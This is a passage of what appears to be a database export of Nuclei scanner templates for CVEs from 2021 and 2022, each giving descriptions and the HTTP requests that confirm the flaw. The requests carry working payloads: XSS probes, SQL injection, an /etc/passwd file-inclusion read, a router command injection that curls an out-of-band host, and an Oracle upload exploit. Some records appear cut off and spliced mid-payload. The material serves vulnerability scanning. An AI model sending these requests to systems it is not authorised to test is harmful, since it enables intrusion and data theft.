|\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/hjue/JustWriting/issues/106\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41467\n - https://github.com/hjue/JustWriting/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-41467\n cwe-id: CWE-79\n epss-score: 0.00133\n epss-percentile: 0.48289\n cpe: cpe:2.3:a:justwriting_project:justwriting:1.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: justwriting_project\n product: justwriting\n tags: cve2021,cve,justwriting,xss,justwriting_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206ceaf43839bf7744044e64e288b4b135c0a9a25f1638c066ee7f2ec6681dc7f4022100e4ea51f58bca51151b2e34e3c43a48ff4a09e9961558ebd344e7e96e23ace169:922c64590222798bb761d5b6d8e72950", "hash": "b96442381c11908d9f24dff0bedc8103", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083c9" }, "name": "CVE-2021-41569.yaml", "content": "id: CVE-2021-41569\n\ninfo:\n name: SAS/Internet 9.4 1520 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: SAS/Internet 9.4 build 1520 and earlier allows local file inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest security patches or updates provided by SAS to fix the LFI vulnerability in the SAS/Internet 9.4 1520 application.\n reference:\n - https://www.mindpointgroup.com/blog/high-risk-vulnerability-discovery-localfileinclusion-sas\n - https://support.sas.com/kb/68/641.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41569\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-41569\n cwe-id: CWE-829\n epss-score: 0.0083\n epss-percentile: 0.81604\n cpe: cpe:2.3:a:sas:sas\\/intrnet:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sas\n product: sas\\/intrnet\n tags: cve2021,cve,sas,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022066c668e47e843611630d49691212fcf0c77d83d76e23ee3b0951b7ec4c12eb2a022018dd9e916134bc6f5153f80143e684c17ed9de2d33bd2a74ba0140f345a91820:922c64590222798bb761d5b6d8e72950", "hash": "860e40a5d06893c976563d1d51d5c10f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083ca" }, "name": "CVE-2021-41648.yaml", "content": "id: CVE-2021-41648\n\ninfo:\n name: PuneethReddyHC action.php SQL Injection\n author: daffainfo\n severity: high\n description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. Using a post request does not sanitize the user input.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/MobiusBinary/CVE-2021-41648\n - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41649\n - http://packetstormsecurity.com/files/165036/PuneethReddyHC-Online-Shopping-System-Advanced-1.0-SQL-Injection.html\n - https://github.com/nu11secur1ty/Windows10Exploits\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-41648\n cwe-id: CWE-89\n epss-score: 0.06237\n epss-percentile: 0.93438\n cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: online-shopping-system-advanced_project\n product: online-shopping-system-advanced\n tags: cve2021,cve,sqli,packetstorm,online-shopping-system-advanced_project\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/action.php\"\n\n body: \"proId=1'&addToCart=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - \"Warning: mysqli_num_rows() expects parameter 1 to be\"\n - \"xdebug-error xe-warning\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220413201af64bc1a1a3d5af7e3f12991972d947be732535eda6ab233b27b11f0cb02205b02cc30b039336e87418c4f197167344c7863ba4811e31206fc8adb2771c217:922c64590222798bb761d5b6d8e72950", "hash": "1c5e98d72d2e22495fa1bb96ef58f5e1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083cb" }, "name": "CVE-2021-41649.yaml", "content": "id: CVE-2021-41649\n\ninfo:\n name: PuneethReddyHC Online Shopping System homeaction.php SQL Injection\n author: daffainfo\n severity: critical\n description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping System through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/MobiusBinary/CVE-2021-41649\n - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41649\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-41649\n cwe-id: CWE-89\n epss-score: 0.03607\n epss-percentile: 0.90729\n cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: online-shopping-system-advanced_project\n product: online-shopping-system-advanced\n tags: cve2021,cve,sqli,injection,online-shopping-system-advanced_project\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/homeaction.php\"\n\n body: \"cat_id=4'&get_seleted_Category=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - \"Warning: mysqli_num_rows() expects parameter 1 to be\"\n - \"xdebug-error xe-warning\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221009f9574560b61dd8f4c9aaf234d06646f1519c0fc78e8ff44222e53a558d4259502201e5cfa092c0c0038bc53b925eb4d0270f7fa08ea4008152abad1281e7331b883:922c64590222798bb761d5b6d8e72950", "hash": "aa5bad4137287c8d450a326cfbe6ccec", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083cc" }, "name": "CVE-2021-41653.yaml", "content": "id: CVE-2021-41653\n\ninfo:\n name: TP-Link - OS Command Injection\n author: gy741\n severity: critical\n description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.\n remediation: Upgrade the firmware to at least version \"TL-WR840N(EU)_V5_211109\".\n reference:\n - https://k4m1ll0.com/cve-2021-41653.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41653\n - https://www.tp-link.com/us/press/security-advisory/\n - http://tp-link.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-41653\n cwe-id: CWE-94\n epss-score: 0.95374\n epss-percentile: 0.99205\n cpe: cpe:2.3:o:tp-link:tl-wr840n_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: tp-link\n product: tl-wr840n_firmware\n tags: cve2021,cve,tplink,rce,router,tp-link\nvariables:\n useragent: '{{rand_base(6)}}'\n\nhttp:\n - raw:\n - |\n POST /cgi?2 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/plain\n Referer: http://{{Hostname}}/mainFrame.htm\n Cookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n [IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\n dataBlockSize=64\n timeout=1\n numberOfRepetitions=4\n host=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')\n X_TP_ConnName=ewan_ipoe_d\n diagnosticsState=Requested\n - |\n POST /cgi?7 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/plain\n Referer: http://{{Hostname}}/mainFrame.htm\n Cookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n [ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n# digest: 490a0046304402205742c2ebff8ce0fc7af74094966181c7ef1dae9ce633a2718335e5010e079d260220194ec4c580b0a470064374d97a3536dc10a47ccc4a195160d4e982e4276ac063:922c64590222798bb761d5b6d8e72950", "hash": "e963b3bcf3c2cb8eda687b42c89c0ea7", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083cd" }, "name": "CVE-2021-41691.yaml", "content": "id: CVE-2021-41691\n\ninfo:\n name: openSIS Student Information System 8.0 SQL Injection\n author: Bartu Utku SARP\n severity: high\n description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: |\n Apply the latest security patch or upgrade to a patched version of openSIS Student Information System to mitigate the SQL Injection vulnerability (CVE-2021-41691).\n reference:\n - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691\n - https://www.exploit-db.com/exploits/50637\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169\n classification:\n cve-id: CVE-2021-41691\n metadata:\n max-request: 2\n tags: cve,cve2021,sqli,auth,edb,opensis\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /index.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n Content-Type: application/x-www-form-urlencoded\n\n USERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n - |\n POST /TransferredOutModal.php?modfunc=detail HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n Content-Type: application/x-www-form-urlencoded\n\n student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5\n\n attack: pitchfork\n payloads:\n username:\n - student\n password:\n - student@123\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_2, \"'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022077a908cc0f84943d99a897323cdeb2899210c5a6cd3d08634c62ced31283feeb022100a8428c5469152520da4ec621970240d45755a2c602d099e22dce986d12653785:922c64590222798bb761d5b6d8e72950", "hash": "e532650b408d50177b1becdc348d8568", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308491" }, "name": "CVE-2022-21587.yaml", "content": "id: CVE-2022-21587\n\ninfo:\n name: Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution\n author: rootxharsh,iamnoooob,pdresearch\n severity: critical\n description: |\n Oracle E-Business Suite 12.2.3 through 12.2.11 is susceptible to remote code execution via the Oracle Web Applications Desktop Integrator product, Upload component. An attacker with HTTP network access can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n remediation: |\n Apply the necessary security patches provided by Oracle to mitigate this vulnerability.\n reference:\n - https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/\n - https://www.oracle.com/security-alerts/cpuoct2022.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-21587\n - http://packetstormsecurity.com/files/171208/Oracle-E-Business-Suite-EBS-Unauthenticated-Arbitrary-File-Upload.html\n - https://github.com/manas3c/CVE-POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-21587\n cwe-id: CWE-306\n epss-score: 0.97315\n epss-percentile: 0.99868\n cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: oracle\n product: e-business_suite\n tags: cve,cve2022,intrusive,ebs,unauth,kev,rce,oast,oracle,packetstorm\n\nhttp:\n - raw:\n - |\n POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n ------WebKitFormBoundaryZsMro0UsAQYLDZGv\n Content-Disposition: form-data; name=\"bne:uueupload\"\n\n TRUE\n ------WebKitFormBoundaryZsMro0UsAQYLDZGv\n Content-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\n begin 664 test.zip\n M4$L#!!0``````\"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO\n M1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\n M1%=24BYP;'5S92!#1TD[\"G!R:6YT($-'23HZ:&5A9&5R*\"`M='EP92`]/B`G\n M=&5X=\"]P;&%I;B<@*3L*;7D@)&-M9\"`](\")E8VAO($YU8VQE:2U#5D4M,C`R\n M,BTR,34X-R([\"G!R:6YT('-Y@```$,``````````````+2!`````\"XN+RXN\n M+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````\n `\n end\n ------WebKitFormBoundaryZsMro0UsAQYLDZGv--\n - |\n GET /OA_CGI/FNDWRR.exe HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n ------WebKitFormBoundaryZsMro0UsAQYLDZGv\n Content-Disposition: form-data; name=\"bne:uueupload\"\n\n TRUE\n ------WebKitFormBoundaryZsMro0UsAQYLDZGv\n Content-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\n begin 664 test.zip\n M4$L#!!0``````&UP-%:3!Malert(document.domain)\") && contains(body, \"microweber\")'\n - 'contains(content_type, \"text/html\")'\n condition: and\n# digest: 490a0046304402207b0db83c22e130322437f1502e113df36df14a74f5080f56e6281a41e9c5ea0c0220391b8aae54c023d95b44dc3d6d6e938160b8236a2e5b130fc7a3441f22d711a9:922c64590222798bb761d5b6d8e72950", "hash": "5a5cc6af40f98d65048ea45bdadc3521", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308495" }, "name": "CVE-2022-2185.yaml", "content": "id: CVE-2022-2185\n\ninfo:\n name: GitLab CE/EE - Remote Code Execution\n author: GitLab Red Team\n severity: high\n description: GitLab CE/EE 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 is susceptible to remote code execution. An authenticated user authorized to import projects can import a maliciously crafted project, thus possibly being able to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches provided by GitLab to mitigate this vulnerability.\n reference:\n - https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester\n - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2185.json\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2185\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2185\n - https://gitlab.com/gitlab-org/gitlab/-/issues/366088\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-2185\n cwe-id: CWE-78\n epss-score: 0.5071\n epss-percentile: 0.97469\n cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*\n metadata:\n max-request: 1\n vendor: gitlab\n product: gitlab\n shodan-query: http.title:\"GitLab\"\n tags: cve,cve2022,gitlab\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/users/sign_in\"\n\n redirects: true\n max-redirects: 3\n matchers:\n - type: word\n words:\n - \"003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa\"\n - \"1062bbba2e9b04e360569154a8df8705a75d9e17de1a3a9acd5bd20f000fec8b\"\n - \"1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8\"\n - \"1ae98447c220181b7bd2dfe88018cb6e1b1e4d12d7b8c224d651a48ed2d95dfe\"\n - \"1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7\"\n - \"1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98\"\n - \"2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be\"\n - \"301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0\"\n - \"383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7\"\n - \"4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7\"\n - \"50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9\"\n - \"515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe\"\n - \"57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de\"\n - \"5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4\"\n - \"5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f\"\n - \"6a58066d1bde4b6e661fbd5bde83d2dd90615ab409b8c8c36e04954fbd923424\"\n - \"6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193\"\n - \"6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef\"\n - \"739a920f5840de93f944ec86c5a181d0205f1d9e679a4df1b9bf5b0882ab848a\"\n - \"775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df\"\n - \"7d0792b17e1d2ccac7c6820dda1b54020b294006d7867b7d78a05060220a0213\"\n - \"8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353\"\n - \"90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159\"\n - \"95ae8966ec1e6021f2553c7d275217fcfecd5a7f0b206151c5fb701beb7baf1e\"\n - \"a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d\"\n - \"a6d68fb0380bece011b0180b2926142630414c1d7a3e268fb461c51523b63778\"\n - \"a743f974bacea01ccc609dcb79247598bd2896f64377ce4a9f9d0333ab7b274e\"\n - \"a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2\"\n - \"ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1\"\n - \"c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209\"\n - \"cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5\"\n - \"e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee\"\n - \"f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac\"\n - \"ff058b10a8dce9956247adba2e410a7f80010a236b2269fb53e0df5cd091e61d\"\n condition: or\n\n extractors:\n - type: regex\n group: 1\n regex:\n - '(?:application-)(\\S{64})(?:\\.css)'\n# digest: 4b0a00483046022100b4127186492776d7641a3e74b310dc16db32c61bcc8aaf0f5eed928c30579768022100a3666fdd83770c9f2bdb11e06228e33df10080c5bea500dad29a7d9ff311b7e1:922c64590222798bb761d5b6d8e72950", "hash": "adb1073364273435a496254eaeade152", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308496" }, "name": "CVE-2022-2187.yaml", "content": "id: CVE-2022-2187\n\ninfo:\n name: WordPress Contact Form 7 Captcha <0.1.2 - Cross-Site Scripting\n author: For3stCo1d\n severity: medium\n description: |\n WordPress Contact Form 7 Captcha plugin before 0.1.2 contains a reflected cross-site scripting vulnerability. It does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update the WordPress Contact Form 7 Captcha plugin to version 0.1.2 or later to mitigate the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/4fd2f1ef-39c6-4425-8b4d-1a332dabac8d\n - https://wordpress.org/plugins/contact-form-7-simple-recaptcha\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2187\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-2187\n cwe-id: CWE-79\n epss-score: 0.00122\n epss-percentile: 0.46372\n cpe: cpe:2.3:a:contact_form_7_captcha_project:contact_form_7_captcha:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: contact_form_7_captcha_project\n product: contact_form_7_captcha\n framework: wordpress\n tags: cve,cve2022,wpscan,wordpress,xss,wp-plugin,wp,contact_form_7_captcha_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-admin/options-general.php?page=cf7sr_edit&\">'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"Contact Form 7\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220135e8e57aec52c36062249a9f60be0fd5bb87f786de39d6a8fbfe9a3c76dc61402205d74f1cbbc26e6b54ae5d6133836104c105071da796608ae749dddbe1863f8d0:922c64590222798bb761d5b6d8e72950", "hash": "ac488444f22fbcd9fa688c3ec1c76264", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308497" }, "name": "CVE-2022-2219.yaml", "content": "id: CVE-2022-2219\n\ninfo:\n name: Unyson < 2.7.27 - Cross Site Scripting\n author: r3Y3r53\n severity: high\n description: |\n The plugin does not sanitise and escape the QUERY_STRING before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data theft, and potential compromise of the affected website.\n remediation: Fixed in version 2.7.27\n reference:\n - https://wpscan.com/vulnerability/1240797c-7f45-4c36-83f0-501c544ce76a\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2219\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\n cvss-score: 7.2\n cve-id: CVE-2022-2219\n cwe-id: CWE-79\n epss-score: 0.00159\n epss-percentile: 0.51461\n cpe: cpe:2.3:a:brizy:unyson:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: brizy\n product: unyson\n framework: wordpress\n tags: cve,cve2022,authenticated,wordpress,wp,xss,unyson,wp-plugin,wpscan,brizy\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=fw-extensions&sub-page=extension&extension=feedback HTTP/1.1\n Host: {{Hostname}}\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \"script%3Ealert%28document.domain%29%3C%2Fscript%3\")'\n - 'contains(body_2, \"Unyson\")'\n condition: and\n# digest: 4a0a00473045022100cfcefb399374a0e1dd65cd66bf15ae4aca3a1a21386b55b3834dbf0526915376022067dfec245e79a0071cf91a2c9932e98f3027dac527f5492b772e911ecb8c28d4:922c64590222798bb761d5b6d8e72950", "hash": "0681aba249ae9aa22ea8bd7ea7f99267", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308498" }, "name": "CVE-2022-22242.yaml", "content": "id: CVE-2022-22242\n\ninfo:\n name: Juniper Web Device Manager - Cross-Site Scripting\n author: EvergreenCartoons\n severity: medium\n description: |\n Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Juniper Networks to mitigate this vulnerability.\n reference:\n - https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/\n - https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-Multiple-vulnerabilities-in-J-Web?language=en_US\n - https://kb.juniper.net/JSA69899\n - https://nvd.nist.gov/vuln/detail/CVE-2022-22242\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-22242\n cwe-id: CWE-79\n epss-score: 0.41023\n epss-percentile: 0.972\n cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: juniper\n product: junos\n shodan-query: title:\"Juniper Web Device Manager\"\n tags: cve2022,cve,xss,juniper,junos\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/error.php?SERVER_NAME='\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"The requested resource is not authorized to view\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100dd079776ea27c19753a8ad4a76e5c18c893747a661ca9102e5624558800ef324022100a443205263e77c92329409a8c948bd4c67eeffeb1aca399e376c871088778361:922c64590222798bb761d5b6d8e72950", "hash": "03946d9a174d70367fc8ca9322b2e95c", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308499" }, "name": "CVE-2022-22536.yaml", "content": "id: CVE-2022-22536\n\ninfo:\n name: SAP Memory Pipes (MPI) Desynchronization\n author: pdteam\n severity: critical\n description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized access to sensitive data and potential data leakage.\n remediation: |\n Apply the latest security patches and updates 